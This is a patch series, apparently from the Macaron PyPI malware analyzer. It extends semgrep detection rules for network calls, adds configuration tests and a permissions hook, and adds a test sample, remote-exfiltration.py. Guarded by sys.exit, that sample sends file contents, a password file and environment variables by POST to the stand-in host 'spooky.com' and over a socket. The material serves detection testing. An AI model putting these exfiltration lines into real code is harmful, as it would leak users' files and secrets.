b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index f6ef8386d..c74122458 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -106,6 +106,7 @@ rules: severity: ERROR mode: taint options: + # This will help detect partial things over multiple lines like: "x = builtins.bytes; x.decode(...)" symbolic_propagation: true pattern-sources: - pattern-either: @@ -171,23 +172,45 @@ rules: - pattern: requests.delete(...) - pattern: requests.head(...) - pattern: requests.options(...) - - pattern: requests.Session(...) + - pattern: requests.patch(...) + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) - pattern: requests.Request(...) # using urllib3 module - - pattern: urllib3.PoolManager(...) - pattern: urllib3.request(...) + # object creation here is included as decoded values may be passed as parameters + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) - pattern: urllib3.HTTPSConnectionPool(...) - - pattern: urllib3.ConnectionPool(...) - - pattern: urllib3.ProxyManager(...) - - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) # using urllib - pattern: urllib.request(...) - pattern: urllib.request.urlopen(...) - # using urlrequest module - - pattern: UrlRequest(...) - - pattern: UrlRequestRequests(...) - - pattern: UrlRequestUrllib(...) # using httpx - pattern: httpx.request(...) - pattern: httpx.get(...) @@ -197,10 +220,29 @@ rules: - pattern: httpx.head(...) - pattern: httpx.options(...) - pattern: httpx.stream(...) + - pattern: httpx.patch(...) - pattern: httpx.AsyncClient(...) - - pattern: httpx.AsyncHTTPTransport(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) - pattern: httpx.Client(...) - - pattern: httpx.Request(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) # process spawning # using subprocess module diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json new file mode 100644 index 000000000..17621c84b --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -0,0 +1,19 @@ +{ + "src.macaron.resources.pypi_malware_rules.remote-exfiltration": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "start": 50, + "end": 50 + } + ] +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py new file mode 100644 index 000000000..2ab4a9e14 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py @@ -0,0 +1,50 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + + def os_to_requests(): + import os + + import requests + with os.popen("cat important_file") as pipe: + requests.post("spooky.com", data=pipe.read()) + + def file_exfil_to_urllib3(): + import os as oo + + import urllib3 as uuu + op = oo.O_RDWR + do_it = oo.open + file = do_it("every_password", op) + man = uuu.PoolManager + http = man().request + http('POST', "spooky.com", body=oo.read(file, 2048)) + + def environ_to_socket(): + import socket as s + from os import environ as environment_vars + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: + soc.connect(('localhost', 0)) + other = soc + other.send(environment_vars) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 2e30b1e33..ffc3e2ef6 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -33,20 +33,27 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: @pytest.mark.skip(reason="experimental feature") -def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("sourcecode_sample_dir", "rule_file"), + [ + pytest.param("obfuscation", "obfuscation.yaml", id="obfuscation"), + pytest.param("exfiltration", "exfiltration.yaml", id="exfiltration"), + ], +) +def test_rules(pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( - os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", "obfuscation" + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir ) with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: expected_results = json.loads(file.read()) - __import__("pprint").pprint(expected_results) analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) pypi_package_json.package_sourcecode_path = sample_path - analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, "obfuscation.yaml") + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) result, analysis = analyzer.analyze(pypi_package_json) From 376f7989a3101bcc0a20231046b60ba2a37a9a23 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 5 Feb 2025 11:00:48 +1000 Subject: [PATCH 10/37] test: testing for invalid pathways in defaults configuration --- .../sourcecode/pypi_sourcecode_analyzer.py | 63 +------------------ .../pypi/test_pypi_sourcecode_analyzer.py | 63 +++++++++++++++++-- 2 files changed, 61 insertions(+), 65 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index e3c325690..ae2864109 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -21,17 +21,13 @@ from macaron.config.defaults import defaults from macaron.config.global_config import global_config -from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset logger: logging.Logger = logging.getLogger(__name__) -IMPORTS = "imports" -CONSTANTS = "constants" -CALLS = "calls" - class PyPISourcecodeAnalyzer: """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. @@ -52,8 +48,6 @@ class PyPISourcecodeAnalyzer: of the package. """ - EXPECTED_PATTERN_CATEGORIES = [IMPORTS, CONSTANTS, CALLS] - def __init__(self, resources_path: str = global_config.resources_path) -> None: """Collect required data for analysing the source code.""" self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) @@ -191,57 +185,6 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes return result, dict(analysis_result) - def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: - """Analyze the source code of the package for malicious dataflow. - - This is the second phase of the source code analyzer. Currently, this function is a placeholder for future - work. - - Parameters - ---------- - pypi_package_json: PyPIPackageJsonAsset - The PyPI package JSON asset object. - - Returns - ------- - tuple[HeuristicResult, dict[str, JsonType]] - Containing the analysis results and relevant dataflows identified. - - Raises - ------ - HeuristicAnalyzerValueError - if there is no source code available. - """ - analysis_result: dict = {} - result: HeuristicResult = HeuristicResult.SKIP - - try: - for filename, content in pypi_package_json.iter_sourcecode(): - try: - _ = ast.parse(content.decode("utf-8")) - except (SyntaxError, ValueError) as ast_parse_error: - logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) - continue - - # tracer = DataFlowTracer() - # tracer.generate_symbol_table(content) - - # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - # is_malware, detail_info = functioncall_analyzer.analyze(content) - # if is_malware: - # result = HeuristicResult.FAIL - - # # TODO: Currently, the result collector does not handle the situation that - # # multiple same filename. In the future, this will be replace with absolute path. - # if detail_info: - # analysis_result[filename] = detail_info - except SourceCodeError as sourcecode_error: - error_msg = "Unable to retrieve PyPI package source code" - logger.debug(error_msg) - raise HeuristicAnalyzerValueError(error_msg) from sourcecode_error - - return result, analysis_result - class DataFlowTracer(ast.NodeVisitor): """The class is used to create the symbol table and analyze the dataflow.""" @@ -354,8 +297,8 @@ def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disabl def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns[CALLS] - suspicious_const: dict = self.suspicious_patterns[CONSTANTS] + suspicious_calls: dict = self.suspicious_patterns["calls"] + suspicious_const: dict = self.suspicious_patterns["constants"] function_call: str = ast.unparse(node.func) args: str = " ".join([ast.unparse(arg) for arg in node.args]) expr: str = ast.unparse(node) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index ffc3e2ef6..658c8cd59 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -4,7 +4,7 @@ """Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" import json import os -from unittest.mock import MagicMock +from unittest.mock import MagicMock, patch import pytest @@ -14,14 +14,59 @@ from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer -@pytest.mark.skip(reason="experimental feature") def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so error.""" with pytest.raises(ConfigurationError): _ = PyPISourcecodeAnalyzer(resources_path="") -@pytest.mark.skip(reason="experimental feature") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_defaults_section(mock_defaults: MagicMock) -> None: + """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" + mock_defaults.has_section.side_effect = lambda _: False + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_custom_path(mock_defaults: MagicMock) -> None: + """Test for when a default path isn't provided, so the custom rule path should be None.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda _: (MagicMock(get=MagicMock(return_value=None))) + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + assert analyzer.custom_rule_path is None + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + assert analyzer.custom_rule_path is None + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: + """Test for when the custom path provided does not exist, so error.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="some_random_path" if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: + """Test for when the provided file is not a valid semgrep rule, so error,""" + # use this file as an invalid semgrep rule as it is most definitely not a semgrep rule, and does exist + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value=os.path.abspath(__file__) if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) @@ -32,7 +77,7 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: analyzer.analyze(pypi_package_json) -@pytest.mark.skip(reason="experimental feature") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") @pytest.mark.parametrize( # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules ("sourcecode_sample_dir", "rule_file"), @@ -41,7 +86,9 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: pytest.param("exfiltration", "exfiltration.yaml", id="exfiltration"), ], ) -def test_rules(pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str) -> None: +def test_rules( + mock_defaults: MagicMock, pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str +) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir @@ -50,6 +97,12 @@ def test_rules(pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_fi with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: expected_results = json.loads(file.read()) + # test defaults without custom rule path + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) pypi_package_json.package_sourcecode_path = sample_path From d25bb69a0d6e62460d785078ed45baaafe49af6b Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 5 Feb 2025 12:30:30 +1000 Subject: [PATCH 11/37] feat: dependency on empty project link, and context manager for sourcecode download --- .../sourcecode/pypi_sourcecode_analyzer.py | 15 ++++-- .../checks/detect_malicious_metadata_check.py | 46 ++++++++++++++----- .../package_registry/pypi_registry.py | 11 ++++- 3 files changed, 55 insertions(+), 17 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index ae2864109..f5931cb33 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -23,13 +23,14 @@ from macaron.config.global_config import global_config from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType, json_extract -from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset logger: logging.Logger = logging.getLogger(__name__) -class PyPISourcecodeAnalyzer: +class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files @@ -48,8 +49,14 @@ class PyPISourcecodeAnalyzer: of the package. """ - def __init__(self, resources_path: str = global_config.resources_path) -> None: - """Collect required data for analysing the source code.""" + def __init__(self, resources_path: str | None = None) -> None: + super().__init__( + name="anomalous_version_analyzer", + heuristic=Heuristics.SUSPICIOUS_PATTERNS, + depends_on=[(Heuristics.EMPTY_PROJECT_LINK, HeuristicResult.FAIL)], + ) + if resources_path is None: + resources_path = global_config.resources_path self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 9c99b8062..9b056da4c 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -100,27 +100,45 @@ def _should_skip( return True return False - def analyze_source(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + def analyze_source( + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult] + ) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package with a textual scan, looking for malicious code patterns. Parameters ---------- pypi_package_json: PyPIPackageJsonAsset The PyPI package JSON asset object. + results: dict[Heuristics, HeuristicResult] + Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result + associated with that heuristic. Returns ------- tuple[HeuristicResult, dict[str, JsonType]] Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + If the analyzer fails due to malformed package information. + ConfigurationError + If the configuration of the analyzer encountered a problem. """ logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) - try: - sourcecode_analyzer = PyPISourcecodeAnalyzer() - return sourcecode_analyzer.analyze(pypi_package_json) - except (ConfigurationError, HeuristicAnalyzerValueError) as source_code_error: - logger.debug("Unable to perform source code analysis: %s", source_code_error) + analyzer = PyPISourcecodeAnalyzer() + + if analyzer.depends_on and self._should_skip(results, analyzer.depends_on): return HeuristicResult.SKIP, {} + try: + with pypi_package_json.sourcecode(): + return analyzer.analyze(pypi_package_json) + except SourceCodeError as error: + error_msg = f"Unable to perform analysis, source code not available: {error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from error + def evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] ) -> tuple[float, JsonType]: @@ -299,9 +317,15 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - # experimental analyze sourcecode feature - if ctx.dynamic_data["analyze_source"] and pypi_package_json.download_sourcecode(): - sourcecode_result, sourcecode_detail_info = self.analyze_source(pypi_package_json) + # experimental sourcecode analysis feature + if ctx.dynamic_data["analyze_source"]: + try: + sourcecode_result, sourcecode_detail_info = self.analyze_source( + pypi_package_json, heuristic_results + ) + except (HeuristicAnalyzerValueError, ConfigurationError): + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result heuristics_detail_info.update(sourcecode_detail_info) @@ -311,8 +335,6 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.LOW result_type = CheckResultType.FAILED - pypi_package_json.cleanup_sourcecode() - result_tables.append( MaliciousMetadataFacts( result=heuristic_results, diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index f3d349d8f..8f86f0dc1 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -10,7 +10,8 @@ import tarfile import tempfile import urllib.parse -from collections.abc import Callable, Iterator +from collections.abc import Callable, Generator, Iterator +from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime @@ -557,6 +558,14 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None + @contextmanager + def sourcecode(self) -> Generator[None]: + """Download and cleanup source code of the package with a context manager.""" + if not self.download_sourcecode(): + raise SourceCodeError("Unable to download package source code.") + yield + self.cleanup_sourcecode() + def download_sourcecode(self) -> bool: """Get the source code of the package and store it in a temporary directory. From 8ad1b19442799333428a0786bed7f4362478bd51 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 5 Feb 2025 16:32:10 +1000 Subject: [PATCH 12/37] chore: added pre-commit hook for sourcecode sample files execution permissions --- .pre-commit-config.yaml | 12 +++++++++++ .../samples_permissions_checker.sh | 20 +++++++++++++++++++ 2 files changed, 32 insertions(+) create mode 100755 scripts/dev_scripts/samples_permissions_checker.sh diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 16c2ff3fa..034608f19 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -203,6 +203,18 @@ repos: always_run: true pass_filenames: false +# Checks that tests/malware_analyzer/pypi/resources/sourcecode_samples files do not have executable permissions +# This is another measure to make sure the files can't be accidentally executed +- repo: local + hooks: + - id: sourcecode-sample-permissions + name: Sourcecode sample executable permissions checker + entry: scripts/dev_scripts/samples_permissions_checker.sh + language: system + always_run: true + pass_filenames: false + + # A linter for Golang - repo: https://github.com/golangci/golangci-lint rev: v1.64.6 diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh new file mode 100755 index 000000000..7f3d9604f --- /dev/null +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -0,0 +1,20 @@ +#!/usr/bin/env bash + +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# +# Checks if the files in tests/malware_analyzer/pypi/resources/sourcecode_samples have executable permissions, +# failing if any do. +# + +MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. && pwd)" +SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" + +# any files have any of the executable bits set +executables=$(find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x) +if [ -n "$executables" ]; then + echo "The following files should not have any executable permissions:" + echo "$executables" + exit 1 +fi From 2469e8611566a5fed805c4890696835b89e35565 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Feb 2025 14:20:35 +1000 Subject: [PATCH 13/37] fix: path outputs are now relative to package, making tests work and better --- .../sourcecode/pypi_sourcecode_analyzer.py | 6 +- .../exfiltration/expected_results.json | 6 +- .../obfuscation/expected_results.json | 176 +++++++++--------- 3 files changed, 95 insertions(+), 93 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index f5931cb33..808f5e568 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -182,12 +182,14 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes result = HeuristicResult.FAIL # some semgrep rules were triggered for finding in semgrep_findings: category = json_extract(finding, ["check_id"], str) - if not category: + file = json_extract(finding, ["path"], str) + if not category or not file: continue - file = json_extract(finding, ["path"], str) + file = os.path.relpath(file, os.path.dirname(source_code_path)) start = json_extract(finding, ["start", "line"], int) end = json_extract(finding, ["end", "line"], int) + analysis_result[category].append({"file": file, "start": start, "end": end}) return result, dict(analysis_result) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 17621c84b..33b4d6716 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,17 +1,17 @@ { "src.macaron.resources.pypi_malware_rules.remote-exfiltration": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote-exfiltration.py", "start": 31, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote-exfiltration.py", "start": 42, "end": 42 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote-exfiltration.py", "start": 50, "end": 50 } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 03bf0858b..1da7cb255 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,448 +1,448 @@ { "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 30, "end": 30 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 33, "end": 33 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 38, "end": 38 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 47, "end": 47 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 67, "end": 67 } ], "src.macaron.resources.pypi_malware_rules.inline-imports": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 33, "end": 33 }, { - "file": 